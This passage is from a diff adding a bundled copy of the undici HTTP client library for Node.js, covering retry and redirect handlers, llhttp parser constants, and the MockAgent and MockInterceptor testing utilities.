Math.min(retryAfterHeader, maxTimeout) + : Math.min(currentTimeout * timeoutFactor ** counter, maxTimeout) + + state.currentTimeout = retryTimeout + + setTimeout(() => cb(null), retryTimeout) + } + + onHeaders (statusCode, rawHeaders, resume, statusMessage) { + const headers = parseHeaders(rawHeaders) + + this.retryCount += 1 + + if (statusCode >= 300) { + this.abort( + new RequestRetryError('Request failed', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + // Checkpoint for resume from where we left it + if (this.resume != null) { + this.resume = null + + if (statusCode !== 206) { + return true + } + + const contentRange = parseRangeHeader(headers['content-range']) + // If no content range + if (!contentRange) { + this.abort( + new RequestRetryError('Content-Range mismatch', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + // Let's start with a weak etag check + if (this.etag != null && this.etag !== headers.etag) { + this.abort( + new RequestRetryError('ETag mismatch', statusCode, { + headers, + count: this.retryCount + }) + ) + return false + } + + const { start, size, end = size } = contentRange + + assert(this.start === start, 'content-range mismatch') + assert(this.end == null || this.end === end, 'content-range mismatch') + + this.resume = resume + return true + } + + if (this.end == null) { + if (statusCode === 206) { + // First time we receive 206 + const range = parseRangeHeader(headers['content-range']) + + if (range == null) { + return this.handler.onHeaders( + statusCode, + rawHeaders, + resume, + statusMessage + ) + } + + const { start, size, end = size } = range + + assert( + start != null && Number.isFinite(start) && this.start !== start, + 'content-range mismatch' + ) + assert(Number.isFinite(start)) + assert( + end != null && Number.isFinite(end) && this.end !== end, + 'invalid content-length' + ) + + this.start = start + this.end = end + } + + // We make our best to checkpoint the 
body for further range headers + if (this.end == null) { + const contentLength = headers['content-length'] + this.end = contentLength != null ? Number(contentLength) : null + } + + assert(Number.isFinite(this.start)) + assert( + this.end == null || Number.isFinite(this.end), + 'invalid content-length' + ) + + this.resume = resume + this.etag = headers.etag != null ? headers.etag : null + + return this.handler.onHeaders( + statusCode, + rawHeaders, + resume, + statusMessage + ) + } + + const err = new RequestRetryError('Request failed', statusCode, { + headers, + count: this.retryCount + }) + + this.abort(err) + + return false + } + + onData (chunk) { + this.start += chunk.length + + return this.handler.onData(chunk) + } + + onComplete (rawTrailers) { + this.retryCount = 0 + return this.handler.onComplete(rawTrailers) + } + + onError (err) { + if (this.aborted || isDisturbed(this.opts.body)) { + return this.handler.onError(err) + } + + this.retryOpts.retry( + err, + { + state: { counter: this.retryCount++, currentTimeout: this.retryAfter }, + opts: { retryOptions: this.retryOpts, ...this.opts } + }, + onRetry.bind(this) + ) + + function onRetry (err) { + if (err != null || this.aborted || isDisturbed(this.opts.body)) { + return this.handler.onError(err) + } + + if (this.start !== 0) { + this.opts = { + ...this.opts, + headers: { + ...this.opts.headers, + range: `bytes=${this.start}-${this.end ?? 
''}` + } + } + } + + try { + this.dispatch(this.opts, this) + } catch (err) { + this.handler.onError(err) + } + } + } +} + +module.exports = RetryHandler + + +/***/ }), + +/***/ 8861: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const RedirectHandler = __nccwpck_require__(2860) + +function createRedirectInterceptor ({ maxRedirections: defaultMaxRedirections }) { + return (dispatch) => { + return function Intercept (opts, handler) { + const { maxRedirections = defaultMaxRedirections } = opts + + if (!maxRedirections) { + return dispatch(opts, handler) + } + + const redirectHandler = new RedirectHandler(dispatch, maxRedirections, opts, handler) + opts = { ...opts, maxRedirections: 0 } // Stop sub dispatcher from also redirecting. + return dispatch(opts, redirectHandler) + } + } +} + +module.exports = createRedirectInterceptor + + +/***/ }), + +/***/ 953: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.SPECIAL_HEADERS = exports.HEADER_STATE = exports.MINOR = exports.MAJOR = exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS = exports.TOKEN = exports.STRICT_TOKEN = exports.HEX = exports.URL_CHAR = exports.STRICT_URL_CHAR = exports.USERINFO_CHARS = exports.MARK = exports.ALPHANUM = exports.NUM = exports.HEX_MAP = exports.NUM_MAP = exports.ALPHA = exports.FINISH = exports.H_METHOD_MAP = exports.METHOD_MAP = exports.METHODS_RTSP = exports.METHODS_ICE = exports.METHODS_HTTP = exports.METHODS = exports.LENIENT_FLAGS = exports.FLAGS = exports.TYPE = exports.ERROR = void 0; +const utils_1 = __nccwpck_require__(1891); +// C headers +var ERROR; +(function (ERROR) { + ERROR[ERROR["OK"] = 0] = "OK"; + ERROR[ERROR["INTERNAL"] = 1] = "INTERNAL"; + ERROR[ERROR["STRICT"] = 2] = "STRICT"; + ERROR[ERROR["LF_EXPECTED"] = 3] = "LF_EXPECTED"; + ERROR[ERROR["UNEXPECTED_CONTENT_LENGTH"] = 4] = "UNEXPECTED_CONTENT_LENGTH"; + 
ERROR[ERROR["CLOSED_CONNECTION"] = 5] = "CLOSED_CONNECTION"; + ERROR[ERROR["INVALID_METHOD"] = 6] = "INVALID_METHOD"; + ERROR[ERROR["INVALID_URL"] = 7] = "INVALID_URL"; + ERROR[ERROR["INVALID_CONSTANT"] = 8] = "INVALID_CONSTANT"; + ERROR[ERROR["INVALID_VERSION"] = 9] = "INVALID_VERSION"; + ERROR[ERROR["INVALID_HEADER_TOKEN"] = 10] = "INVALID_HEADER_TOKEN"; + ERROR[ERROR["INVALID_CONTENT_LENGTH"] = 11] = "INVALID_CONTENT_LENGTH"; + ERROR[ERROR["INVALID_CHUNK_SIZE"] = 12] = "INVALID_CHUNK_SIZE"; + ERROR[ERROR["INVALID_STATUS"] = 13] = "INVALID_STATUS"; + ERROR[ERROR["INVALID_EOF_STATE"] = 14] = "INVALID_EOF_STATE"; + ERROR[ERROR["INVALID_TRANSFER_ENCODING"] = 15] = "INVALID_TRANSFER_ENCODING"; + ERROR[ERROR["CB_MESSAGE_BEGIN"] = 16] = "CB_MESSAGE_BEGIN"; + ERROR[ERROR["CB_HEADERS_COMPLETE"] = 17] = "CB_HEADERS_COMPLETE"; + ERROR[ERROR["CB_MESSAGE_COMPLETE"] = 18] = "CB_MESSAGE_COMPLETE"; + ERROR[ERROR["CB_CHUNK_HEADER"] = 19] = "CB_CHUNK_HEADER"; + ERROR[ERROR["CB_CHUNK_COMPLETE"] = 20] = "CB_CHUNK_COMPLETE"; + ERROR[ERROR["PAUSED"] = 21] = "PAUSED"; + ERROR[ERROR["PAUSED_UPGRADE"] = 22] = "PAUSED_UPGRADE"; + ERROR[ERROR["PAUSED_H2_UPGRADE"] = 23] = "PAUSED_H2_UPGRADE"; + ERROR[ERROR["USER"] = 24] = "USER"; +})(ERROR = exports.ERROR || (exports.ERROR = {})); +var TYPE; +(function (TYPE) { + TYPE[TYPE["BOTH"] = 0] = "BOTH"; + TYPE[TYPE["REQUEST"] = 1] = "REQUEST"; + TYPE[TYPE["RESPONSE"] = 2] = "RESPONSE"; +})(TYPE = exports.TYPE || (exports.TYPE = {})); +var FLAGS; +(function (FLAGS) { + FLAGS[FLAGS["CONNECTION_KEEP_ALIVE"] = 1] = "CONNECTION_KEEP_ALIVE"; + FLAGS[FLAGS["CONNECTION_CLOSE"] = 2] = "CONNECTION_CLOSE"; + FLAGS[FLAGS["CONNECTION_UPGRADE"] = 4] = "CONNECTION_UPGRADE"; + FLAGS[FLAGS["CHUNKED"] = 8] = "CHUNKED"; + FLAGS[FLAGS["UPGRADE"] = 16] = "UPGRADE"; + FLAGS[FLAGS["CONTENT_LENGTH"] = 32] = "CONTENT_LENGTH"; + FLAGS[FLAGS["SKIPBODY"] = 64] = "SKIPBODY"; + FLAGS[FLAGS["TRAILING"] = 128] = "TRAILING"; + // 1 << 8 is unused + 
FLAGS[FLAGS["TRANSFER_ENCODING"] = 512] = "TRANSFER_ENCODING"; +})(FLAGS = exports.FLAGS || (exports.FLAGS = {})); +var LENIENT_FLAGS; +(function (LENIENT_FLAGS) { + LENIENT_FLAGS[LENIENT_FLAGS["HEADERS"] = 1] = "HEADERS"; + LENIENT_FLAGS[LENIENT_FLAGS["CHUNKED_LENGTH"] = 2] = "CHUNKED_LENGTH"; + LENIENT_FLAGS[LENIENT_FLAGS["KEEP_ALIVE"] = 4] = "KEEP_ALIVE"; +})(LENIENT_FLAGS = exports.LENIENT_FLAGS || (exports.LENIENT_FLAGS = {})); +var METHODS; +(function (METHODS) { + METHODS[METHODS["DELETE"] = 0] = "DELETE"; + METHODS[METHODS["GET"] = 1] = "GET"; + METHODS[METHODS["HEAD"] = 2] = "HEAD"; + METHODS[METHODS["POST"] = 3] = "POST"; + METHODS[METHODS["PUT"] = 4] = "PUT"; + /* pathological */ + METHODS[METHODS["CONNECT"] = 5] = "CONNECT"; + METHODS[METHODS["OPTIONS"] = 6] = "OPTIONS"; + METHODS[METHODS["TRACE"] = 7] = "TRACE"; + /* WebDAV */ + METHODS[METHODS["COPY"] = 8] = "COPY"; + METHODS[METHODS["LOCK"] = 9] = "LOCK"; + METHODS[METHODS["MKCOL"] = 10] = "MKCOL"; + METHODS[METHODS["MOVE"] = 11] = "MOVE"; + METHODS[METHODS["PROPFIND"] = 12] = "PROPFIND"; + METHODS[METHODS["PROPPATCH"] = 13] = "PROPPATCH"; + METHODS[METHODS["SEARCH"] = 14] = "SEARCH"; + METHODS[METHODS["UNLOCK"] = 15] = "UNLOCK"; + METHODS[METHODS["BIND"] = 16] = "BIND"; + METHODS[METHODS["REBIND"] = 17] = "REBIND"; + METHODS[METHODS["UNBIND"] = 18] = "UNBIND"; + METHODS[METHODS["ACL"] = 19] = "ACL"; + /* subversion */ + METHODS[METHODS["REPORT"] = 20] = "REPORT"; + METHODS[METHODS["MKACTIVITY"] = 21] = "MKACTIVITY"; + METHODS[METHODS["CHECKOUT"] = 22] = "CHECKOUT"; + METHODS[METHODS["MERGE"] = 23] = "MERGE"; + /* upnp */ + METHODS[METHODS["M-SEARCH"] = 24] = "M-SEARCH"; + METHODS[METHODS["NOTIFY"] = 25] = "NOTIFY"; + METHODS[METHODS["SUBSCRIBE"] = 26] = "SUBSCRIBE"; + METHODS[METHODS["UNSUBSCRIBE"] = 27] = "UNSUBSCRIBE"; + /* RFC-5789 */ + METHODS[METHODS["PATCH"] = 28] = "PATCH"; + METHODS[METHODS["PURGE"] = 29] = "PURGE"; + /* CalDAV */ + METHODS[METHODS["MKCALENDAR"] = 30] = "MKCALENDAR"; + /* 
RFC-2068, section 19.6.1.2 */ + METHODS[METHODS["LINK"] = 31] = "LINK"; + METHODS[METHODS["UNLINK"] = 32] = "UNLINK"; + /* icecast */ + METHODS[METHODS["SOURCE"] = 33] = "SOURCE"; + /* RFC-7540, section 11.6 */ + METHODS[METHODS["PRI"] = 34] = "PRI"; + /* RFC-2326 RTSP */ + METHODS[METHODS["DESCRIBE"] = 35] = "DESCRIBE"; + METHODS[METHODS["ANNOUNCE"] = 36] = "ANNOUNCE"; + METHODS[METHODS["SETUP"] = 37] = "SETUP"; + METHODS[METHODS["PLAY"] = 38] = "PLAY"; + METHODS[METHODS["PAUSE"] = 39] = "PAUSE"; + METHODS[METHODS["TEARDOWN"] = 40] = "TEARDOWN"; + METHODS[METHODS["GET_PARAMETER"] = 41] = "GET_PARAMETER"; + METHODS[METHODS["SET_PARAMETER"] = 42] = "SET_PARAMETER"; + METHODS[METHODS["REDIRECT"] = 43] = "REDIRECT"; + METHODS[METHODS["RECORD"] = 44] = "RECORD"; + /* RAOP */ + METHODS[METHODS["FLUSH"] = 45] = "FLUSH"; +})(METHODS = exports.METHODS || (exports.METHODS = {})); +exports.METHODS_HTTP = [ + METHODS.DELETE, + METHODS.GET, + METHODS.HEAD, + METHODS.POST, + METHODS.PUT, + METHODS.CONNECT, + METHODS.OPTIONS, + METHODS.TRACE, + METHODS.COPY, + METHODS.LOCK, + METHODS.MKCOL, + METHODS.MOVE, + METHODS.PROPFIND, + METHODS.PROPPATCH, + METHODS.SEARCH, + METHODS.UNLOCK, + METHODS.BIND, + METHODS.REBIND, + METHODS.UNBIND, + METHODS.ACL, + METHODS.REPORT, + METHODS.MKACTIVITY, + METHODS.CHECKOUT, + METHODS.MERGE, + METHODS['M-SEARCH'], + METHODS.NOTIFY, + METHODS.SUBSCRIBE, + METHODS.UNSUBSCRIBE, + METHODS.PATCH, + METHODS.PURGE, + METHODS.MKCALENDAR, + METHODS.LINK, + METHODS.UNLINK, + METHODS.PRI, + // TODO(indutny): should we allow it with HTTP? 
+ METHODS.SOURCE, +]; +exports.METHODS_ICE = [ + METHODS.SOURCE, +]; +exports.METHODS_RTSP = [ + METHODS.OPTIONS, + METHODS.DESCRIBE, + METHODS.ANNOUNCE, + METHODS.SETUP, + METHODS.PLAY, + METHODS.PAUSE, + METHODS.TEARDOWN, + METHODS.GET_PARAMETER, + METHODS.SET_PARAMETER, + METHODS.REDIRECT, + METHODS.RECORD, + METHODS.FLUSH, + // For AirPlay + METHODS.GET, + METHODS.POST, +]; +exports.METHOD_MAP = utils_1.enumToMap(METHODS); +exports.H_METHOD_MAP = {}; +Object.keys(exports.METHOD_MAP).forEach((key) => { + if (/^H/.test(key)) { + exports.H_METHOD_MAP[key] = exports.METHOD_MAP[key]; + } +}); +var FINISH; +(function (FINISH) { + FINISH[FINISH["SAFE"] = 0] = "SAFE"; + FINISH[FINISH["SAFE_WITH_CB"] = 1] = "SAFE_WITH_CB"; + FINISH[FINISH["UNSAFE"] = 2] = "UNSAFE"; +})(FINISH = exports.FINISH || (exports.FINISH = {})); +exports.ALPHA = []; +for (let i = 'A'.charCodeAt(0); i <= 'Z'.charCodeAt(0); i++) { + // Upper case + exports.ALPHA.push(String.fromCharCode(i)); + // Lower case + exports.ALPHA.push(String.fromCharCode(i + 0x20)); +} +exports.NUM_MAP = { + 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, + 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, +}; +exports.HEX_MAP = { + 0: 0, 1: 1, 2: 2, 3: 3, 4: 4, + 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, + A: 0XA, B: 0XB, C: 0XC, D: 0XD, E: 0XE, F: 0XF, + a: 0xa, b: 0xb, c: 0xc, d: 0xd, e: 0xe, f: 0xf, +}; +exports.NUM = [ + '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', +]; +exports.ALPHANUM = exports.ALPHA.concat(exports.NUM); +exports.MARK = ['-', '_', '.', '!', '~', '*', '\'', '(', ')']; +exports.USERINFO_CHARS = exports.ALPHANUM + .concat(exports.MARK) + .concat(['%', ';', ':', '&', '=', '+', '$', ',']); +// TODO(indutny): use RFC +exports.STRICT_URL_CHAR = [ + '!', '"', '$', '%', '&', '\'', + '(', ')', '*', '+', ',', '-', '.', '/', + ':', ';', '<', '=', '>', + '@', '[', '\\', ']', '^', '_', + '`', + '{', '|', '}', '~', +].concat(exports.ALPHANUM); +exports.URL_CHAR = exports.STRICT_URL_CHAR + .concat(['\t', '\f']); +// All characters with 0x80 bit set to 1 +for 
(let i = 0x80; i <= 0xff; i++) { + exports.URL_CHAR.push(i); +} +exports.HEX = exports.NUM.concat(['a', 'b', 'c', 'd', 'e', 'f', 'A', 'B', 'C', 'D', 'E', 'F']); +/* Tokens as defined by rfc 2616. Also lowercases them. + * token = 1* + * separators = "(" | ")" | "<" | ">" | "@" + * | "," | ";" | ":" | "\" | <"> + * | "/" | "[" | "]" | "?" | "=" + * | "{" | "}" | SP | HT + */ +exports.STRICT_TOKEN = [ + '!', '#', '$', '%', '&', '\'', + '*', '+', '-', '.', + '^', '_', '`', + '|', '~', +].concat(exports.ALPHANUM); +exports.TOKEN = exports.STRICT_TOKEN.concat([' ']); +/* + * Verify that a char is a valid visible (printable) US-ASCII + * character or %x80-FF + */ +exports.HEADER_CHARS = ['\t']; +for (let i = 32; i <= 255; i++) { + if (i !== 127) { + exports.HEADER_CHARS.push(i); + } +} +// ',' = \x44 +exports.CONNECTION_TOKEN_CHARS = exports.HEADER_CHARS.filter((c) => c !== 44); +exports.MAJOR = exports.NUM_MAP; +exports.MINOR = exports.MAJOR; +var HEADER_STATE; +(function (HEADER_STATE) { + HEADER_STATE[HEADER_STATE["GENERAL"] = 0] = "GENERAL"; + HEADER_STATE[HEADER_STATE["CONNECTION"] = 1] = "CONNECTION"; + HEADER_STATE[HEADER_STATE["CONTENT_LENGTH"] = 2] = "CONTENT_LENGTH"; + HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING"] = 3] = "TRANSFER_ENCODING"; + HEADER_STATE[HEADER_STATE["UPGRADE"] = 4] = "UPGRADE"; + HEADER_STATE[HEADER_STATE["CONNECTION_KEEP_ALIVE"] = 5] = "CONNECTION_KEEP_ALIVE"; + HEADER_STATE[HEADER_STATE["CONNECTION_CLOSE"] = 6] = "CONNECTION_CLOSE"; + HEADER_STATE[HEADER_STATE["CONNECTION_UPGRADE"] = 7] = "CONNECTION_UPGRADE"; + HEADER_STATE[HEADER_STATE["TRANSFER_ENCODING_CHUNKED"] = 8] = "TRANSFER_ENCODING_CHUNKED"; +})(HEADER_STATE = exports.HEADER_STATE || (exports.HEADER_STATE = {})); +exports.SPECIAL_HEADERS = { + 'connection': HEADER_STATE.CONNECTION, + 'content-length': HEADER_STATE.CONTENT_LENGTH, + 'proxy-connection': HEADER_STATE.CONNECTION, + 'transfer-encoding': HEADER_STATE.TRANSFER_ENCODING, + 'upgrade': HEADER_STATE.UPGRADE, +}; +//# 
sourceMappingURL=constants.js.map + +/***/ }), + +/***/ 1145: +/***/ ((module) => { + +module.exports = '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' + + +/***/ }), + +/***/ 5627: +/***/ ((module) => { + +module.exports = '' + + +/***/ }), + +/***/ 1891: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.enumToMap = void 0; +function enumToMap(obj) { + const res = {}; + Object.keys(obj).forEach((key) => { + const value = obj[key]; + if (typeof value === 'number') { + res[key] = value; + } + }); + return res; +} +exports.enumToMap = enumToMap; +//# sourceMappingURL=utils.js.map + +/***/ }), + +/***/ 6771: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kClients } = __nccwpck_require__(2785) +const Agent = __nccwpck_require__(7890) +const { + kAgent, + kMockAgentSet, + kMockAgentGet, + kDispatches, + kIsMockActive, + kNetConnect, + kGetNetConnect, + kOptions, + kFactory +} = __nccwpck_require__(4347) +const MockClient = __nccwpck_require__(8687) +const MockPool = __nccwpck_require__(6193) +const { matchValue, buildMockOptions } = __nccwpck_require__(9323) +const { InvalidArgumentError, UndiciError } = __nccwpck_require__(8045) +const Dispatcher = __nccwpck_require__(412) +const Pluralizer = __nccwpck_require__(8891) +const PendingInterceptorsFormatter = __nccwpck_require__(6823) + +class FakeWeakRef { + constructor (value) { + this.value = value + } + + deref () { + return this.value + } +} + +class MockAgent extends Dispatcher { + constructor (opts) { + super(opts) + + this[kNetConnect] = true + this[kIsMockActive] = true + + // Instantiate Agent and encapsulate + if ((opts && opts.agent && typeof opts.agent.dispatch !== 'function')) { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + const agent = opts && opts.agent ? 
opts.agent : new Agent(opts) + this[kAgent] = agent + + this[kClients] = agent[kClients] + this[kOptions] = buildMockOptions(opts) + } + + get (origin) { + let dispatcher = this[kMockAgentGet](origin) + + if (!dispatcher) { + dispatcher = this[kFactory](origin) + this[kMockAgentSet](origin, dispatcher) + } + return dispatcher + } + + dispatch (opts, handler) { + // Call MockAgent.get to perform additional setup before dispatching as normal + this.get(opts.origin) + return this[kAgent].dispatch(opts, handler) + } + + async close () { + await this[kAgent].close() + this[kClients].clear() + } + + deactivate () { + this[kIsMockActive] = false + } + + activate () { + this[kIsMockActive] = true + } + + enableNetConnect (matcher) { + if (typeof matcher === 'string' || typeof matcher === 'function' || matcher instanceof RegExp) { + if (Array.isArray(this[kNetConnect])) { + this[kNetConnect].push(matcher) + } else { + this[kNetConnect] = [matcher] + } + } else if (typeof matcher === 'undefined') { + this[kNetConnect] = true + } else { + throw new InvalidArgumentError('Unsupported matcher. Must be one of String|Function|RegExp.') + } + } + + disableNetConnect () { + this[kNetConnect] = false + } + + // This is required to bypass issues caused by using global symbols - see: + // https://github.com/nodejs/undici/issues/1447 + get isMockActive () { + return this[kIsMockActive] + } + + [kMockAgentSet] (origin, dispatcher) { + this[kClients].set(origin, new FakeWeakRef(dispatcher)) + } + + [kFactory] (origin) { + const mockOptions = Object.assign({ agent: this }, this[kOptions]) + return this[kOptions] && this[kOptions].connections === 1 + ? 
new MockClient(origin, mockOptions) + : new MockPool(origin, mockOptions) + } + + [kMockAgentGet] (origin) { + // First check if we can immediately find it + const ref = this[kClients].get(origin) + if (ref) { + return ref.deref() + } + + // If the origin is not a string create a dummy parent pool and return to user + if (typeof origin !== 'string') { + const dispatcher = this[kFactory]('http://localhost:9999') + this[kMockAgentSet](origin, dispatcher) + return dispatcher + } + + // If we match, create a pool and assign the same dispatches + for (const [keyMatcher, nonExplicitRef] of Array.from(this[kClients])) { + const nonExplicitDispatcher = nonExplicitRef.deref() + if (nonExplicitDispatcher && typeof keyMatcher !== 'string' && matchValue(keyMatcher, origin)) { + const dispatcher = this[kFactory](origin) + this[kMockAgentSet](origin, dispatcher) + dispatcher[kDispatches] = nonExplicitDispatcher[kDispatches] + return dispatcher + } + } + } + + [kGetNetConnect] () { + return this[kNetConnect] + } + + pendingInterceptors () { + const mockAgentClients = this[kClients] + + return Array.from(mockAgentClients.entries()) + .flatMap(([origin, scope]) => scope.deref()[kDispatches].map(dispatch => ({ ...dispatch, origin }))) + .filter(({ pending }) => pending) + } + + assertNoPendingInterceptors ({ pendingInterceptorsFormatter = new PendingInterceptorsFormatter() } = {}) { + const pending = this.pendingInterceptors() + + if (pending.length === 0) { + return + } + + const pluralizer = new Pluralizer('interceptor', 'interceptors').pluralize(pending.length) + + throw new UndiciError(` +${pluralizer.count} ${pluralizer.noun} ${pluralizer.is} pending: + +${pendingInterceptorsFormatter.format(pending)} +`.trim()) + } +} + +module.exports = MockAgent + + +/***/ }), + +/***/ 8687: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { promisify } = __nccwpck_require__(3837) +const Client = __nccwpck_require__(3598) +const { 
buildMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kMockAgent, + kClose, + kOriginalClose, + kOrigin, + kOriginalDispatch, + kConnected +} = __nccwpck_require__(4347) +const { MockInterceptor } = __nccwpck_require__(410) +const Symbols = __nccwpck_require__(2785) +const { InvalidArgumentError } = __nccwpck_require__(8045) + +/** + * MockClient provides an API that extends the Client to influence the mockDispatches. + */ +class MockClient extends Client { + constructor (origin, opts) { + super(origin, opts) + + if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { + throw new InvalidArgumentError('Argument opts.agent must implement Agent') + } + + this[kMockAgent] = opts.agent + this[kOrigin] = origin + this[kDispatches] = [] + this[kConnected] = 1 + this[kOriginalDispatch] = this.dispatch + this[kOriginalClose] = this.close.bind(this) + + this.dispatch = buildMockDispatch.call(this) + this.close = this[kClose] + } + + get [Symbols.kConnected] () { + return this[kConnected] + } + + /** + * Sets up the base interceptor for mocking replies from undici. 
+ */ + intercept (opts) { + return new MockInterceptor(opts, this[kDispatches]) + } + + async [kClose] () { + await promisify(this[kOriginalClose])() + this[kConnected] = 0 + this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) + } +} + +module.exports = MockClient + + +/***/ }), + +/***/ 888: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { UndiciError } = __nccwpck_require__(8045) + +class MockNotMatchedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, MockNotMatchedError) + this.name = 'MockNotMatchedError' + this.message = message || 'The request does not match any registered mock dispatches' + this.code = 'UND_MOCK_ERR_MOCK_NOT_MATCHED' + } +} + +module.exports = { + MockNotMatchedError +} + + +/***/ }), + +/***/ 410: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { getResponseData, buildKey, addMockDispatch } = __nccwpck_require__(9323) +const { + kDispatches, + kDispatchKey, + kDefaultHeaders, + kDefaultTrailers, + kContentLength, + kMockDispatch +} = __nccwpck_require__(4347) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { buildURL } = __nccwpck_require__(3983) + +/** + * Defines the scope API for an interceptor reply + */ +class MockScope { + constructor (mockDispatch) { + this[kMockDispatch] = mockDispatch + } + + /** + * Delay a reply by a set amount in ms. + */ + delay (waitInMs) { + if (typeof waitInMs !== 'number' || !Number.isInteger(waitInMs) || waitInMs <= 0) { + throw new InvalidArgumentError('waitInMs must be a valid integer > 0') + } + + this[kMockDispatch].delay = waitInMs + return this + } + + /** + * For a defined reply, never mark as consumed. + */ + persist () { + this[kMockDispatch].persist = true + return this + } + + /** + * Allow one to define a reply for a set amount of matching requests. 
+ */ + times (repeatTimes) { + if (typeof repeatTimes !== 'number' || !Number.isInteger(repeatTimes) || repeatTimes <= 0) { + throw new InvalidArgumentError('repeatTimes must be a valid integer > 0') + } + + this[kMockDispatch].times = repeatTimes + return this + } +} + +/** + * Defines an interceptor for a Mock + */ +class MockInterceptor { + constructor (opts, mockDispatches) { + if (typeof opts !== 'object') { + throw new InvalidArgumentError('opts must be an object') + } + if (typeof opts.path === 'undefined') { + throw new InvalidArgumentError('opts.path must be defined') + } + if (typeof opts.method === 'undefined') { + opts.method = 'GET' + } + // See https://github.com/nodejs/undici/issues/1245 + // As per RFC 3986, clients are not supposed to send URI + // fragments to servers when they retrieve a document, + if (typeof opts.path === 'string') { + if (opts.query) { + opts.path = buildURL(opts.path, opts.query) + } else { + // Matches https://github.com/nodejs/undici/blob/main/lib/fetch/index.js#L1811 + const parsedURL = new URL(opts.path, 'data://') + opts.path = parsedURL.pathname + parsedURL.search + } + } + if (typeof opts.method === 'string') { + opts.method = opts.method.toUpperCase() + } + + this[kDispatchKey] = buildKey(opts) + this[kDispatches] = mockDispatches + this[kDefaultHeaders] = {} + this[kDefaultTrailers] = {} + this[kContentLength] = false + } + + createMockScopeDispatchData (statusCode, data, responseOptions = {}) { + const responseData = getResponseData(data) + const contentLength = this[kContentLength] ? 
{ 'content-length': responseData.length } : {} + const headers = { ...this[kDefaultHeaders], ...contentLength, ...responseOptions.headers } + const trailers = { ...this[kDefaultTrailers], ...responseOptions.trailers } + + return { statusCode, data, headers, trailers } + } + + validateReplyParameters (statusCode, data, responseOptions) { + if (typeof statusCode === 'undefined') { + throw new InvalidArgumentError('statusCode must be defined') + } + if (typeof data === 'undefined') { + throw new InvalidArgumentError('data must be defined') + } + if (typeof responseOptions !== 'object') { + throw new InvalidArgumentError('responseOptions must be an object') + } + } + + /** + * Mock an undici request with a defined reply. + */ + reply (replyData) { + // Values of reply aren't available right now as they + // can only be available when the reply callback is invoked. + if (typeof replyData === 'function') { + // We'll first wrap the provided callback in another function, + // this function will properly resolve the data from the callback + // when invoked. + const wrappedDefaultsCallback = (opts) => { + // Our reply options callback contains the parameter for statusCode, data and options. + const resolvedData = replyData(opts) + + // Check if it is in the right format + if (typeof resolvedData !== 'object') { + throw new InvalidArgumentError('reply options callback must return an object') + } + + const { statusCode, data = '', responseOptions = {} } = resolvedData + this.validateReplyParameters(statusCode, data, responseOptions) + // Since the values can be obtained immediately we return them + // from this higher order function that will be resolved later. + return { + ...this.createMockScopeDispatchData(statusCode, data, responseOptions) + } + } + + // Add usual dispatch data, but this time set the data parameter to function that will eventually provide data. 
+ const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], wrappedDefaultsCallback) + return new MockScope(newMockDispatch) + } + + // We can have either one or three parameters, if we get here, + // we should have 1-3 parameters. So we spread the arguments of + // this function to obtain the parameters, since replyData will always + // just be the statusCode. + const [statusCode, data = '', responseOptions = {}] = [...arguments] + this.validateReplyParameters(statusCode, data, responseOptions) + + // Send in-already provided data like usual + const dispatchData = this.createMockScopeDispatchData(statusCode, data, responseOptions) + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], dispatchData) + return new MockScope(newMockDispatch) + } + + /** + * Mock an undici request with a defined error. + */ + replyWithError (error) { + if (typeof error === 'undefined') { + throw new InvalidArgumentError('error must be defined') + } + + const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], { error }) + return new MockScope(newMockDispatch) + } + + /** + * Set default reply headers on the interceptor for subsequent replies + */ + defaultReplyHeaders (headers) { + if (typeof headers === 'undefined') { + throw new InvalidArgumentError('headers must be defined') + } + + this[kDefaultHeaders] = headers + return this + } + + /** + * Set default reply trailers on the interceptor for subsequent replies + */ + defaultReplyTrailers (trailers) { + if (typeof trailers === 'undefined') { + throw new InvalidArgumentError('trailers must be defined') + } + + this[kDefaultTrailers] = trailers + return this + } + + /** + * Set reply content length header for replies on the interceptor + */ + replyContentLength () { + this[kContentLength] = true + return this + } +} + +module.exports.MockInterceptor = MockInterceptor +module.exports.MockScope = MockScope + + +/***/ }), + +/***/ 6193: +/***/ ((module, 
